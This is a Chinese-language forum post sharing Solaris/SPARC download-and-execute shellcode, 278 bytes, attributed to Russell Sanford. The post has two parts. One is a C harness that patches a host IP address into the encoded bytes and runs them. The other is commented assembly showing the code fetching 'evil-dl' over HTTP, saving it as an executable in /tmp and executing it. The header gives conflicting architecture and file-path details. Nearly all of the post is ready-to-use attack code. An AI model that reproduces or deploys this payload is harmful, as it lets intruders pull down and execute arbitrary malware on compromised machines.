发新话题
打印

solaris/sparc download and execute 278 bytes

solaris/sparc download and execute 278 bytes

复制内容到剪贴板
代码:
<pre>/* black-dl-exec-SOLARIS.c (MIPS) [278:bytes] Dowloads a binary from host given named 'evil-dl' to '/tmp/ff' then executes. 11.21.6 Russell Sanford (xort@blacksecurity.org) gcc -lnsl black-dl-exec-SOLARIS.c -o bdes */ #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> // opcode encodings for performing sethi/or against/into register %o1 w/ nulled data #define SETHI_O1 0x13000000 #define OR_O1 0x92126000 char dl_exec_sh[] = "\xa6\x1a\xc0\x0b\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x10\x20\x02\x92\x10\x20\x02" "\x94\x1a\x80\x0a\x96\x1a\xc0\x0b\x98\x10\x20\x01\x82\x10\x20\xe6\x91\xd0\x20\x08\xc0\x2b\xe0\xa6" "\xd0\x23\xbf\xfc\x92\x20\x3f\xfe\x93\x2a\x60\x10\x92\x22\x7f\xb0\xd2\x23\xbf\xec\x13\x37\xab\x6f" "\x92\x12\x62\xef\xd2\x23\xbf\xf0\xc0\x23\xbf\xf4\x92\x03\xbf\xec\x94\x10\x20\x10\x82\x10\x20\xeb" "\x91\xd0\x20\x08\xc0\x2b\xe1\x0e\x92\x03\xe0\xfc\x94\x20\x3f\xf2\xd0\x03\xbf\xfc\x82\x10\x20\x04" "\x91\xd0\x20\x08\xc0\x2b\xe0\xfb\x90\x03\xe0\xf4\x94\x20\x3c\x13\x92\x20\x3e\xfe\x82\x10\x20\x05" "\x91\xd0\x20\x08\xd0\x23\xbf\xf8\xd0\x03\xbf\xfc\x92\x03\xbf\xc4\x94\x10\x20\x14\x82\x10\x20\x03" "\x91\xd0\x20\x08\xa4\xa4\xc0\x08\x02\x80\x00\x06\x94\x0a\x3f\xff\xd0\x03\xbf\xf8\x82\x10\x20\x04" "\x91\xd0\x20\x08\x10\xbf\xff\xf5\x94\x1a\x80\x0a\xd4\x23\xe0\xfc\xd4\x23\xe0\xf0\x90\x03\xe0\xf4" "\xd0\x23\xe0\xec\x92\x03\xe0\xec\x82\x10\x20\x0b\x91\xd0\x20\x08\x6f\x6d\x66\x67\x20\x73\x6f\x6c" "\x61\x72\x69\x73\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x7a\x21\x2f\x74\x6d\x70\x2f\x71\x71\x41" "\x47\x45\x54\x20\x2f\x65\x76\x69\x6c\x2d\x64\x6c\x0a\x0a"; void patchcode(long webserver) { // fix sethi instruction to set up ip. *(long *)&dl_exec_sh[68] = SETHI_O1 + ((webserver)>>10 & 0x3fffff); // FIX or instruction to set up ip. *(long *)&dl_exec_sh[72] = OR_O1 + (webserver & 0x2ff); } void (*fakefunc)(); void main() { patchcode(inet_addr("10.1.1.3")); char *buffer = (char *) malloc(1024); memcpy(buffer, dl_exec_sh, 280); fakefunc = buffer; fakefunc(); } /* !----------------------------------------------------------------------------+ ! (Solaris/Sparc) d/l + exec shellcode --+\+-- ! ! --+\+-- Russell Sanford xort@blacksecurity.org ! !----------------------------------------------------------------------------+ ! discription: Downloads a binary called 'evil-dl' from specified host to ! ! '/tmp/qq' and then executes it. ! ! +----------+ ! bytes: 278 ! 11.21.06 ! !-----------------------------------------------------------------+----------+ .global main main: !------------------------------------------ ! figure out our location in memory !------------------------------------------ a: xor %o3, %o3, %l3 ! stick a null in %o3 for later use b: bn,a a ! returns location of call instruction in o7 c: bn,a b ! call c ! !------------------------------------------ ! create a PF_INET socket(). !------------------------------------------ mov 0x2, %o0 ! PF_INET mov 0x2, %o1 ! SOCK_STREAM xor %o2, %o2, %o2 ! 0 xor %o3, %o3, %o3 ! 0 -- note: this may already be nulled... mov 0x1, %o4 ! 1 mov 0xe6, %g1 ! SYS_so_socket ta 8 stb %r0, [%o7 + 166] ! here we patch the foward jump st %o0, [%sp + -4] ! store sockfd in sp-4 !------------------------------------------ ! create sockaddr_in struct !------------------------------------------ conout: sub %r0, -2, %o1 sll %o1, 16, %o1 sub %o1, -80, %o1 ! set port to port 80 st %o1, [%sp - 20] ! sethi %hi(0xDEADBEEF), %o1 ! set %o1 to hex value of ip address (substitute from 0xdeadbeef) or %lo(0xDEADBEEF), %o1, %o1 ! st %o1, [%sp - 16] ! store address from %o1 in struct. st %r0, [%sp - 12] !------------------------------------------ ! connect() to host. !------------------------------------------ ! note: %o0 still sockfd from socket() add %sp, -20, %o1 ! pointer to sockaddr_in struct mov 16, %o2 ! sizeof(struct sockaddr) mov 235, %g1 ! SYS_connect ta 8 !------------------------------------------ ! send request for file !------------------------------------------ stb %r0, [%o7 + 270] add %o7, 252, %o1 ! 252 - distance from call to string sub %r0, -14, %o2 ! set %o2 to 14 (bytes - size of request) ... 252-238=14 ld [%sp + -4], %o0 ! load filefd's fd from sp-4 mov 4, %g1 ! SYS_write ta 8 !------------------------------------------ ! open file !------------------------------------------ stb %r0, [%o7 + 251] add %o7, 244, %o0 ! distance to beginning of localfile string sub %g0, -1005, %o2 ! (1005) perms = rwxr-xr-x sub %g0, -258, %o1 ! set %o0 to 0x102 (O_RWONLY|O_CREAT) ... 248+14=258 mov 5, %g1 ! SYS_open ta 8 st %o0, [%sp + -8] ! store filefd's fd in sp-8 read_loop: !------------------------------------------ ! read from website !------------------------------------------ ld [%sp + -4], %o0 ! set %o0 to sockfd's fd add %sp, -60, %o1 ! buffer space mov 20, %o2 ! 20 bytes mov 3, %g1 ! SYS_read ta 8 subcc %l3, %o0, %l2 ! compare %o0 (bytes read) to %l3 (zero) be dl_loop_exit !------------------------------------------ ! write to file !------------------------------------------ ! note: %o1 still points to buffer and %o0, -1, %o2 ! set %o2 to bytes read ld [%sp + -8], %o0 ! set %o0 to filefd's fd from sp-8 mov 4, %g1 ! SYS_write ta 8 ba read_loop ! loop back to beginning fo read_loop !------------------------------------------ ! execute file !------------------------------------------ dl_loop_exit: ! here we patch the string under local_file to be the correct args to pass to exec xor %o2, %o2, %o2 ! set %o2 to 0 st %o2, [%o7 + 252] ! store null dword in mem st %o2, [%o7 + 240] ! store null dword in mem add %o7, 244, %o0 ! set %o0 to point to string: '/tmp/qq' st %o0, [%o7 + 236] ! store pointer to string in struct in memory add %o7, 236, %o1 ! set %o1 to point to beginning of struct mov 0xb, %g1 ! SYS_execl ta 8 .ascii "omfg solaris shellcodez!" ! for some lol'in local_file: .ascii "/tmp/qq" .byte 0x41 remote_file: .ascii "GET /evil-dl" .byte 0xa .byte 0xa end: */ </pre>

TOP

发新话题